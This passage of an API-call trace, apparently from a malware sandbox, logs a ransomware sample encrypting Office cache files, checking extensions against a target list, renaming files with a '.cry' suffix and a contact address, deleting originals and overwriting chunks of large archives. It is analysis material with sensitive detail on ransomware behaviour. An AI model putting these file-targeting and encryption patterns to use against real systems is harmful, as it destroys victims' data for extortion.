Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0049.805] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0049.805] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.805] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.805] lstrlenW (lpString=".doc") returned 4 [0049.805] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0049.805] lstrlenW (lpString=".docx") returned 5 [0049.805] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0049.805] lstrlenW (lpString=".pdf") returned 4 [0049.805] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0049.805] lstrlenW (lpString=".xls") returned 4 [0049.805] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0049.805] lstrlenW (lpString=".xlsx") returned 5 [0049.805] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0049.805] lstrlenW (lpString=".ppt") returned 4 [0049.805] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0049.805] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.805] lstrlenW (lpString=".zip") returned 4 [0049.805] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0049.805] lstrlenW (lpString=".rar") returned 4 [0049.805] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0049.805] lstrlenW (lpString=".bz2") returned 4 [0049.805] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0049.805] lstrlenW (lpString=".7z") returned 3 [0049.805] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0049.805] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.805] lstrlenW (lpString=".dbf") returned 4 [0049.805] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0049.805] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.805] lstrlenW (lpString=".1cd") returned 4 [0049.805] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0049.806] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.806] lstrlenW (lpString=".jpg") returned 4 [0049.806] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0049.806] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.806] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.806] lstrlenW (lpString=".doc") returned 4 [0049.806] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0049.806] lstrlenW (lpString=".docx") returned 5 [0049.806] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0049.806] lstrlenW (lpString=".pdf") returned 4 [0049.806] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0049.806] lstrlenW (lpString=".xls") returned 4 [0049.806] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0049.806] lstrlenW (lpString=".xlsx") returned 5 [0049.806] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0049.806] lstrlenW (lpString=".ppt") returned 4 [0049.806] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0049.806] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.806] lstrlenW (lpString=".zip") returned 4 [0049.806] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0049.806] lstrlenW (lpString=".rar") returned 4 [0049.806] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0049.806] lstrlenW (lpString=".bz2") returned 4 [0049.806] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0049.806] lstrlenW (lpString=".7z") returned 3 [0049.806] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0049.806] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.806] lstrlenW (lpString=".dbf") returned 4 [0049.806] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0049.806] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.806] lstrlenW (lpString=".1cd") returned 4 [0049.806] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0049.806] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0049.806] lstrlenW (lpString=".jpg") returned 4 [0049.806] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0049.807] lstrcmpiW (lpString1=".exe", lpString2=".cry") returned 1 [0049.807] lstrlenW (lpString="setup.exe") returned 9 [0049.807] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0049.807] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1377656) returned 1 [0049.807] CloseHandle (hObject=0x1bc) returned 1 [0049.807] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0049.807] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0049.807] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0049.807] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.807] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.807] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.808] GetLastError () returned 0x0 [0049.808] ReadFile (in: hFile=0x1bc, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0050.090] WriteFile (in: hFile=0x20c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0050.105] ReadFile (in: hFile=0x1bc, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x50588, lpOverlapped=0x0) returned 1 [0050.239] WriteFile (in: hFile=0x20c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x50590, lpOverlapped=0x0) returned 1 [0050.246] ReadFile (in: hFile=0x1bc, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.246] WriteFile (in: hFile=0x20c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0050.246] SetEndOfFile (hFile=0x20c) returned 1 [0050.247] CloseHandle (hObject=0x20c) returned 1 [0050.247] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.247] SetEndOfFile (hFile=0x1bc) returned 1 [0050.250] CloseHandle (hObject=0x1bc) returned 1 [0050.250] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0050.250] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0050.250] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.250] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.250] lstrlenW (lpString=".doc") returned 4 [0050.250] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0050.250] lstrlenW (lpString=".docx") returned 5 [0050.250] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0050.250] lstrlenW (lpString=".pdf") returned 4 [0050.250] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0050.250] lstrlenW (lpString=".xls") returned 4 [0050.250] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0050.250] lstrlenW (lpString=".xlsx") returned 5 [0050.250] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0050.250] lstrlenW (lpString=".ppt") returned 4 [0050.250] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0050.250] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.250] lstrlenW (lpString=".zip") returned 4 [0050.250] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0050.251] lstrlenW (lpString=".rar") returned 4 [0050.251] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0050.251] lstrlenW (lpString=".bz2") returned 4 [0050.251] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0050.251] lstrlenW (lpString=".7z") returned 3 [0050.251] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0050.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.251] lstrlenW (lpString=".dbf") returned 4 [0050.251] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0050.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.251] lstrlenW (lpString=".1cd") returned 4 [0050.251] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0050.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.251] lstrlenW (lpString=".jpg") returned 4 [0050.251] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0050.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.251] lstrlenW (lpString=".doc") returned 4 [0050.251] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0050.251] lstrlenW (lpString=".docx") returned 5 [0050.251] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0050.251] lstrlenW (lpString=".pdf") returned 4 [0050.251] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0050.251] lstrlenW (lpString=".xls") returned 4 [0050.251] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0050.251] lstrlenW (lpString=".xlsx") returned 5 [0050.251] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0050.251] lstrlenW (lpString=".ppt") returned 4 [0050.251] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0050.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.251] lstrlenW (lpString=".zip") returned 4 [0050.251] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0050.251] lstrlenW (lpString=".rar") returned 4 [0050.251] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0050.251] lstrlenW (lpString=".bz2") returned 4 [0050.251] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0050.251] lstrlenW (lpString=".7z") returned 3 [0050.251] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0050.251] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.252] lstrlenW (lpString=".dbf") returned 4 [0050.252] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0050.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.252] lstrlenW (lpString=".1cd") returned 4 [0050.252] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0050.252] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0050.252] lstrlenW (lpString=".jpg") returned 4 [0050.252] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0050.252] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0050.252] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0050.252] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0050.317] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=36233052) returned 1 [0050.317] CloseHandle (hObject=0x1bc) returned 1 [0050.317] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0050.318] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.318] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0050.318] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0050.318] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0050.318] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.318] ReadFile (in: hFile=0x1bc, lpBuffer=0x3630058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3630058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.343] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.343] ReadFile (in: hFile=0x1bc, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.362] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0050.362] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.362] ReadFile (in: hFile=0x1bc, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.548] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.548] WriteFile (in: hFile=0x1bc, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0050.606] SetEndOfFile (hFile=0x1bc) returned 1 [0050.662] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3f34090 [0050.665] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.665] WriteFile (in: hFile=0x1bc, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.666] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.666] WriteFile (in: hFile=0x1bc, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.676] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.676] WriteFile (in: hFile=0x1bc, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.678] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f34090 | out: hHeap=0x600000) returned 1 [0050.678] CloseHandle (hObject=0x1bc) returned 1 [0050.679] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0050.679] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.679] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.679] lstrlenW (lpString=".doc") returned 4 [0050.680] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.680] lstrlenW (lpString=".docx") returned 5 [0050.680] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.680] lstrlenW (lpString=".pdf") returned 4 [0050.680] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.680] lstrlenW (lpString=".xls") returned 4 [0050.680] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.680] lstrlenW (lpString=".xlsx") returned 5 [0050.680] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.680] lstrlenW (lpString=".ppt") returned 4 [0050.680] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.680] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.680] lstrlenW (lpString=".zip") returned 4 [0050.680] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.680] lstrlenW (lpString=".rar") returned 4 [0050.680] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.680] lstrlenW (lpString=".bz2") returned 4 [0050.680] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.680] lstrlenW (lpString=".7z") returned 3 [0050.680] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.680] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.680] lstrlenW (lpString=".dbf") returned 4 [0050.680] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.680] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.680] lstrlenW (lpString=".1cd") returned 4 [0050.680] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.680] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.680] lstrlenW (lpString=".jpg") returned 4 [0050.680] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.680] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.680] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.680] lstrlenW (lpString=".doc") returned 4 [0050.680] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.680] lstrlenW (lpString=".docx") returned 5 [0050.680] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.681] lstrlenW (lpString=".pdf") returned 4 [0050.681] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.681] lstrlenW (lpString=".xls") returned 4 [0050.681] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.681] lstrlenW (lpString=".xlsx") returned 5 [0050.681] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.681] lstrlenW (lpString=".ppt") returned 4 [0050.681] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.681] lstrlenW (lpString=".zip") returned 4 [0050.681] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.681] lstrlenW (lpString=".rar") returned 4 [0050.681] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.681] lstrlenW (lpString=".bz2") returned 4 [0050.681] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.681] lstrlenW (lpString=".7z") returned 3 [0050.681] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.681] lstrlenW (lpString=".dbf") returned 4 [0050.681] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.681] lstrlenW (lpString=".1cd") returned 4 [0050.681] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.681] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.681] lstrlenW (lpString=".jpg") returned 4 [0050.681] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.681] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0050.688] lstrlenW (lpString="VisiorWW.cab") returned 12 [0050.689] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.720] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=195011319) returned 1 [0050.720] CloseHandle (hObject=0x210) returned 1 [0050.720] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab")) returned 0x2020 [0050.720] GetFileAttributesW (lpFileName="C:\\MSOCache\\All 